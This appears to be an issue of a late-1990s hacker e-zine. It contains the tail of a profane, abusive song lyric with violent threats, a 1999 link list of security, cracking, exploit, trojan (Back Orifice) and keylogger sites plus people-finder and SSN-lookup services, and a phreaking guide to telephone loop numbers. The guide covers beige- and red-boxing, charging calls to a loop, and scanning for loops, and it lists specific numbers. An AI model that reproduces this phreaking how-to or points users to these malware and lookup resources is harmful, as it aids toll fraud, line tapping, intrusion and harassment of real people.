I had to run to a fucking hangar
(He's a pain in my ass)
And if a girlie ever see's this whore
There's no chance he'll ever bang her
(He never ever gets da pussy)
JP shut up
(Piece of shit whore)
You piece of shit whore
(I know a piece of shit media whore)
You piece of shit whore
(Piece of shit whore)
And you call us liars
(You're a piece of shit whore)
Look in the fucking mirror
(Piece of shit whore)
You'll be seven different colors
(You piece of shit media whore)
Fucking crowbar into your lap
(Piece of shit whore)
You'll be puking eve-ry-where
(You're a piece of shit whore)
(Piece of shit whore)
(You're a piece of shit whore)
(Piece of shit whore)
The whole world thinks your a loser
(You're a piece of shit whore)
Maybe I'll give you a push
(Piece of shit whore...)
[-------------------------------------]
kv[13]; /* Top WWW Sites......................................ntwak0 */
LOU Fast Handy Links
NtWaK0 June 06, 1999
Hello to all my brothers and sisters -;).
This time I decide to make some diffrent and handy and that can help
everyone. A novie or ereet person. After years of experience in
computing field I did find out that if we have nice organized
idea/file/links/whatever/you/want, well we do our job better and
faster and less stress >>less Coffee.
So I decided to put out a nice list that contain security information.
I will be keeping this up-to-date and the plan is to have a nice small
HTML format file that can be used any where you go just dump it on
diskette or what ever you like.
Sorry for the list I wished I could make it bigger but I had time
restriction. Let IT GROW. ;)
I could make the links on different files, but I wanted to have
something on one file. So your suggestion are more then welcome.
Shout-out to all LOU members /friends.
1. Security
2. Tools
3. Search
4. News
Security
* Information
+ http://csrc.nist.gov/secpubs/rainbow
È See document: http://csrc.nist.gov/secpubs/rainbow
+ Canadian gov information
È See document: http://csrc.nist.gov/nistpubs/cc/
+ Electronically OK!
È See document: http://eok.net/
+ http://gandalf.isu.edu/security/security.html
È See document: http://gandalf.isu.edu/security/security.html
+ firewall-wizards messages
È See document: http://www.nfr.net/firewall-wizards/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ CIAC Bulletins
È See document: http://ciac.llnl.gov/ciac/
+ Tips of the month
È See document: http://199.44.114.223/rharri/tips.htm
+ http://www.warforge.com/
È See document: http://www.warforge.com/
+ NT security
È See document:
http://www.txdirect.net/users/wall/ntlinks.htm
+ http://www.fedz.net/
È See document: http://www.fedz.net/
+ http://www.daxion.demon.co.uk/
È See document: http://www.daxion.demon.co.uk/
+ http://www.infilsec.com/
È See document: http://www.infilsec.com/
+ http://gandalf.isu.edu/
È See document: http://gandalf.isu.edu/
+ http://www.nfr.net/
È See document: http://www.nfr.net/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ Security Links UNIX NT etc...
È See document:
http://www.ntsecurity.net/scripts/loader.asp?iD=/security/nt
resources.htm
+ Computers Security information
È See document: http://www.alw.nih.gov/Security/security.html
+ COAST Hotlist kudos
È See document: http://www.cs.purdue.edu/coast/hotlist/
+ Computer Security Resource Clearinghouse
È See document: http://csrc.ncsl.nist.gov/
+ Computer Incident Advisory Capability
È See document: http://ciac.llnl.gov/
+ NT FAQ
È See document: http://www.ntfaq.com/
+ NT Download Zdnet Site
È See document:
http://www.zdnet.com/windows/nt/security/ntbugtraq/
+ http://www.trustedsystems.com/
È See document: http://www.trustedsystems.com/
+ http://www.infowar.com/
È See document: http://www.infowar.com/
+ http://www.securezone.com/
È See document: http://www.securezone.com/
+ Computers Consulting Links
È See document: http://www.ahandyguide.com/cat1/c/c1305.htm
+ http://www.ntresearch.com/
È See document: http://www.ntresearch.com/
+ NT Admin Tools
È See document: http://www.ntadmintools.com/
+ New dimension security Trainning
È See document: http://www.newdimensions.net
+ Statistics
o http://nic.merit.edu:/nsfnet/statistics/
È See document: http://nic.merit.edu:/nsfnet/statistics/
o http://www.hack.gr/cgi-bin/webstats
È See document: http://www.hack.gr/cgi-bin/webstats
o Get a live Internet Traffic Report
È See document: http://www.internettrafficreport.com/
o Web Statistics
È See document: http://www.hack.gr/cgi-bin/webstats
o Crime Security Systems
È See document: http://www.crime-freesecurity.com/
+ Unix
o http://www.users.fast.net/
È See document: http://www.users.fast.net/
o http://w56.ml.org/
È See document: http://w56.ml.org/
* App
+ WatchDog Software (unix)
È See document: http://www.infstream.com/
+ Reporting Software
È See document: http://www.notify.com/audit.htm
+ Netsuite Professional Audit Sotware
È See document:
http://www.netsuite.com/cgi/template.pl/site/products/index.
html
+ NDG Software's
È See document: http://www.comsecltd.com/archive/ndgfile.html
+ aelita enterprise suite
È See document: http://www.ntsecurity.com/Products/index.html
+ SeNTry - the Enterprise Event Manager
È See document:
http://www.missioncritical.com/product/list.htm
+ The MerzScope Sampler
È See document: http://www.merzcom.com/prod/scop/sampler.html
+ Hackershield
È See document:
https://secure.interlog.com/netect/hsblform.htm
+ T-sight
È See document:
http://www.engarde.com/software/t-sight/index.html
+ NTManage v2.08
È See document: http://www.lanware.net/download/
+ Forensic and Security Software
È See document: http://www.secure-data.com/tools.html
+ Site Manager Software
È See document:
http://194.87.208.92/product/bay/network/site.htm
+ RealSecure Software
È See document: http://www.iss.net/prod/rs.html
+ Shadoware - Real-Time Network Security Monitoring
È See document: http://www.intrusion.com
+ Kane Security Analyst Software
È See document: http://www.intrusion.com/product.htm
[ruler.gif]
Tools
* Vulnerability Track
+ http://www.ntsecurity.net/
È See document: http://www.ntsecurity.net/
+ http://www.geek-girl.com/bugtraq/search.html
È See document: http://www.geek-girl.com/bugtraq/search.html
+ http://www.cert.org/
È See document: http://www.cert.org/
+ http://www.insecure.org/
È See document: http://www.insecure.org/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ Exploit Track
È See document: http://www.geek-girl.com/bugtraq/search.html
+ Vulnerability engine
È See document:
http://www.infilsec.com/cgi-infilsec/if?action=search?
* Crackz
+ http://bmh.underboss.com/cracks.html
È See document: http://bmh.underboss.com/cracks.html
* Registry
+ NT Registry Hack
È See document: http://www.jsiinc.com/reghack.htm
+ Registry Tips Very Good
È See document:
http://www.regedit.com/Security/Restrictions_and_Policies/
+ Win 95 Reg Hack
È See document:
http://www.cnet.com/Content/Features/Howto/Hacks/index.html
* OnLine Tools
+ Hacker Home Page
È See document: http://www.cyberarmy.com/
+ Nice serach for Hackers
È See document: http://ww2.hitbox.com/
+ Get NT user and Group List Using IE
È See document: http://209.146.229.2/NTSecurity/default.asp
+ FTP Fast
È See document: http://ftpsearch.ntnu.no/
+ Find People anywhere
È See document: http://www.worldpages.com/reshome.html/
+ Get a social number USA
È See document: http://kadima.com/
+ World Page
È See document: http://www.worldpages.com
+ Search for Any domain
È See document: http://www.alldomains.com/
+ Whois Server
o telnet://whois.internic.net/
È See document: telnet://whois.internic.net/
o telnet://nic.ddn.mil 43
È See document: telnet://nic.ddn.mil 43
+ Word list all lang
È See document: ftp://sable.ox.ac.uk/pub/wordlists
+ Nameserver Lookup
È See document:
http://jos.net/projects/nslookup4WWW/nslookup4WWW.html
* List 1
+ http://www.fortrex.com/trn_hacker_tools.htm
È See document: http://www.fortrex.com/trn_hacker_tools.htm
+ Windows NT Web Server Tools
È See document: http://www.interlacken.com/winnt/ntwebsrv.htm
+ Information Security Resource
È See document: http://www.sabernet.net/
+ Script page
È See document: http://worldwidemart.com/scripts/
+ http://www.hackersclub.com/km/library
È See document: http://www.hackersclub.com/km/library
+ http://www.apbonline.com/gfiles/
È See document: http://www.apbonline.com/gfiles/
+ http://www.jabukie.com/
È See document: http://www.jabukie.com/
+ Hackers Hall Of Fame
È See document:
http://eagle2.online.discovery.com/area/technology/hackers/h
ackers.html
+ http://www.thecodex.com/hacking.html
È See document: http://www.thecodex.com/hacking.html
+ http://www.sysone.demon.co.uk/newhack.htm
È See document: http://www.sysone.demon.co.uk/newhack.htm
+ http://www.bikkel.com/~demoniz/
È See document: http://www.bikkel.com/~demoniz/
+ Team 2600 MAC Hacking
È See document: http://cyberpunkz.com/team2600/products.html
+ Stealth Keyboard Interceptor
È See document:
http://www.fortunecity.com/skyscraper/cache/426/key_log.html
+ Snadboy's Revelation
È See document: http://www.snadboy.com/Revelation.shtml
+ SATAN Unix
È See document: http://www.cs.ruu.nl/cert-uu/satan.html
+ L0pht Crack
È See document: http://www.l0pht.com/l0phtcrack/
+ IP Spoofing
È See document: http://ryanspc.com/ipspoof.html
+ Trojan Like Bo
È See document: http://hax0r.to/deept/
+ Back Orifice
È See document: http://www.cultdeadcow.com/tools/
+ Collection of hacking CDROM
È See document: http://www.hackershomepage.com/section7.htm
+ Hacking CD
È See document: http://members.xoom.com/hackingcd/smallcd.htm
+ Hacker Gold CDROM
È See document: http://www.hackerscatalog.com/hackgold.htm
+ Hackershield
È See document:
https://secure.interlog.com/netect/hsblform.htm
+ http://ds.dial.pipex.com/legends/
È See document: http://ds.dial.pipex.com/legends/
+ United Hackers Association
È See document: http://205.237.55.207/
+ http://www.hackcanada.com/
È See document: http://www.hackcanada.com/
+ http://rhino9.ml.org/
È See document: http://rhino9.ml.org/
+ http://www.genocide2600.com/~tattooman/ADM/
È See document: http://www.genocide2600.com/~tattooman/ADM/
+ http://www.insecure.org/nmap/
È See document: http://www.insecure.org/nmap/
+ http://bewoner.dma.be/clan/
È See document: http://bewoner.dma.be/clan/
+ Linux Project Personal Page Check Often
È See document: http://www.cri.cz/kra/index.html
+ Hacking NT Tools
È See document: http://www.kull.ch/Bauersachs/cracknt_e.asp
+ tHe w1ck3d k1nGs
È See document: http://members.xoom.com/SOSSEC/frames.html
+ The United Council
È See document: http://www.unitedcouncil.org/
+ Hacking Tools & Virus
È See document: http://home.bip.net/ttorp/enter.html
+ Hacker Club
È See document: http://hackersclub.com/km/files/
+ Hide Away
È See document: http://www.hideaway.net/
+ http://underground.org
È See document: http://underground.org
+ http://www.phrack.com
È See document: http://www.phrack.com
+ http://www.subz3ro.com/
È See document: http://www.subz3ro.com/
+ 901 check in the future
È See document: http://www.901.org/files.html
+ Good site must check often
È See document:
http://www.fortunecity.com/skyscraper/quantum/488/KiNdReD.ht
ml
+ Check Often Phreak and Hack
È See document: http://www.johnhead.demon.nl/frames.htm
+ WebFringe Hacker Web Links
È See document: http://www.webfringe.com/top100/?progen
+ Microsoft hack files
È See document: ftp://ftp.technotronic.com/microsoft/
+ http://www.2600.com/beyondhope/
È See document: http://www.2600.com/beyondhope/
+ http://www.brd.ie/papers/
È See document: http://www.brd.ie/papers/
+ Magazine
2600
Underground Informer
+ Unix
http://www.squirrel.com/squirrel/index.html
http://www.users.fast.net/
* List 2
+ http://www.chez.com/rekcah/
È See document: http://www.chez.com/rekcah/
+ http://www.altern.org/snem1/frames/
È See document: http://www.altern.org/snem1/frames/
+ http://www.hackersntrackers.com/
È See document: http://www.hackersntrackers.com/
+ http://membres.tripod.fr/Hackito/Newtaz.html
È See document: http://membres.tripod.fr/Hackito/Newtaz.html
+ Active Matrix's Hideaway
È See document: http://www.hideaway.net/
+ http://www.clic.net/~hello/puppet/
È See document: http://www.clic.net/~hello/puppet/
* Exploits and Search
+ http://www.geek-girl.com/bugtraq/search.html
È See document: http://www.geek-girl.com/bugtraq/search.html
+ http://www.genocide2600.com/~tattooman/index.shtml
È See document:
http://www.genocide2600.com/~tattooman/index.shtml
+ http://www.pulhas.org/exploits/
È See document: http://www.pulhas.org/exploits/
+ http://www.hackcity.com/
È See document: http://www.hackcity.com/
+ http://www.real-secure.org/security/exploits/
È See document: http://www.real-secure.org/security/exploits/
+ http://www.antioffline.com/
È See document: http://www.antioffline.com/
+ http://www.macroshaft.org/noie.html
È See document: http://www.macroshaft.org/noie.html
+ http://www.securitysearch.net/
È See document: http://www.securitysearch.net/
+ http://adm.freelsd.net/
È See document: http://adm.freelsd.net/
+ http://www.undersec.com/
È See document: http://www.undersec.com/
+ http://www.raza-mexicana.org
È See document: http://www.raza-mexicana.org
+ http://www.arctik.com
È See document: http://www.arctik.com
+ http://personales.mundivia.es/sneaker
È See document: http://personales.mundivia.es/sneaker
+ http://homocyberian.cjb.net
È See document: http://homocyberian.cjb.net
+ http://719.cjb.net
È See document: http://719.cjb.net
+ http://www.sekure.org/english/index.html
È See document: http://www.sekure.org/english/index.html
+ http://www.cybermedia.co.in/hotnews.htm
È See document: http://www.cybermedia.co.in/hotnews.htm
+ http://www.securiteam.com/
È See document: http://www.securiteam.com/
+ http://www.ntsecurity.net/
È See document: http://www.ntsecurity.net/
+ http://www.networkcommand.com/
È See document: http://www.networkcommand.com/
+ http://www.attrition.org/errata/
È See document: http://www.attrition.org/errata/
+ http://www.ciac.org/
È See document: http://www.ciac.org/
+ http://www.eeye.com/index.html
È See document: http://www.eeye.com/index.html
+ http://www.alternetive.asso.fr/securite/securiteSoft.htm
È See document:
http://www.alternetive.asso.fr/securite/securiteSoft.htm
+ http://www.insecure.org/
È See document: http://www.insecure.org/
+ http://www.iss.net/xforce/
È See document: http://www.iss.net/xforce/
+ http://www.infilsec.com/cgi-infilsec/if?action=search?
È See document:
http://www.infilsec.com/cgi-infilsec/if?action=search?
+ http://www.nmrc.org/
È See document: http://www.nmrc.org/
+ http://www.technotronic.com/
È See document: http://www.technotronic.com/
+ http://www.cookiecentral.com/
È See document: http://www.cookiecentral.com/
[ruler.gif]
Search
* Altavista
È See document: http://altavista.digital.com/
* Altavista Translator
È See document: http://babelfish.altavista.digital.com/
* HotBot
È See document: http://hotbot.com
* DogPile
È See document: http://www.dogpile.com/
* 12 Serach Engine In One
È See document: http://www.800go.com/800go.html
* Deja News
È See document: http://www.dejanews.com/
* Handilinks
È See document: http://www.handilinks.com/
* Find People Kadima
È See document: http://kadima.com/
* World Yellow Pages
È See document: http://www.worldpages.com/reshome.html/
* World Yellow Pages
È See document: http://www.worldpages.com
* http://www.800go.com/800go.html
È See document: http://www.800go.com/800go.html
* Support Microsoft
È See document: http://support.microsoft.com/support/search/c.asp?
* Security Serach Engine
È See document: http://www.securitysearch.net/
* Country
+ Canada 411
È See document: http://canada411.sympatico.ca/index.html
+ St-Bruno
È See document: http://www.pageweb.qc.ca/st-bruno/default.htm
[ruler.gif]
News
* http://www.hackernews.com/
È See document: http://www.hackernews.com/
* http://www.infowar.com/hacker/hacker.html-ssi
È See document: http://www.infowar.com/hacker/hacker.html-ssi
* Hacked SiteArchives of hacked sites
È See document: http://www.onething.com/archive/
* New Dimension archive hacked
È See document: http://www.newdimensions.net/hacktrash.htm
* AntiOnline archive of hacked
È See document: http://www.antionline.com/archives/pages/
* http://www.wired.com/
È See document: http://www.wired.com/
* http://innerpulse.com/
È See document: http://innerpulse.com/
* www.innerpulsewwwboard.com
È See document: http://www.innerpulsewwwboard.com
* http://www.innerpulsehacks.com
È See document: http://www.innerpulsehacks.com
* News Group
+ news://alt.security
È See document: news://alt.security
+ news://comp.security.announce
È See document: news://comp.security.announce
+ List of Security List Servers
È See document: ListServer.htm
* Magazine
+ Virus 40HEX
È See document: http://www.eff.org/pub/Publications/CuD/
+ Safer Magazine
È See document: http://www.siamrelay.com/
* Dokumentation des Chaos
È See document: http://presse.ccc.de/
* http://www.sans.org/digest.htm
È See document: http://www.sans.org/digest.htm
[-------------------------------------]
kv[14]; /* Intro to Loops.....................................hitman */
$Intro.$
Loop numbers can be found in all area codes and are made up primarily of
two phone numbers which are usually consectitive.
ex;
201-376-9929 201-376-9930
(actual working loop number in NJ)
The two numbers are connected and have a constant on hook voltage. If you
called the lower number and your buddy phreak called the higher number you
would be instantly connected! Sorta like a conference table.(which mah
boy error explains about it in a issue of A9F4) Any way you will know if
you are on one of the two is if you either hear silence or a loud
tone.(100hz)This is the low number,(through dozens of tests) if you hear
a low beep then you on the higher number.
$The Fun Begins...$
I know by know you are wondering what the hell you need a loop number for
or how to find one for if not you wouldn't be reading this txt. Having a
loop number is one of the numbero uno things a field phreak can have next
to a beige/red box. It can offer even more anonymity while talking on the
phone.
For example, you can either beige box your neighbors TNI or beige box the
splice box around the corner and dial one of the numbers and talk to your
waiting friend and/or red box a payphone and dial,etc. This is one of the
greatest things to have if you want to talk to someone other than an at&t
conference number.
You can also place charges on the loop.Say for instance you get on a conf.
or maybe the operator asks where should you place the charges. Have your
friend be on the loop and tell her the number. Maybe not a good idea but
wtf.
It is very simple but painstakingly hard to scan for loops. One of my
tricks is to enter one of your town/cities normal prefixes and then add
99xx/99xX. I got around 5 or 6 out of probably 20 attempts. I'm not too
sure of the risks of scanning for loops,plus Bell hasn't mailed me
anything yet so i guess its okay. Just don't be dialing all day. Do a few
at a time. Just dial three or four random numbers per day and you can make
up a wrong number or/me no speak no english story.
$In the End...$
Loop numbers can be very fun and useful to anyone who wants the extra
stealth when talking about upcoming projects or meetings and the such.But
it also has its drawbacks like trying to find Loop Numbers. So i decided
to put in a few loop numbers in here from a few npas around the country.
Some may work and some may not.
That's life,dig it.
*****Loop List*****
California
213-360-1118 $ 213-365-1118
213-360-1119 $ 213-365-1119
Florida
305-964-9951 $ 305-778-9952
305-778-9951 $ 305-964-9952
Michigan
313-731-9996 $ 313-722-9996
313-731-9997 $ 313-722-9997
New Jersey
201-558-9929 $ 201-992-9929
201-558-9930 $ 201-992-9930
*****Loop List*****
[----------thats all folks-------]
http://www.underzine.com - An LoU joint..... [www.legions.org]
Comments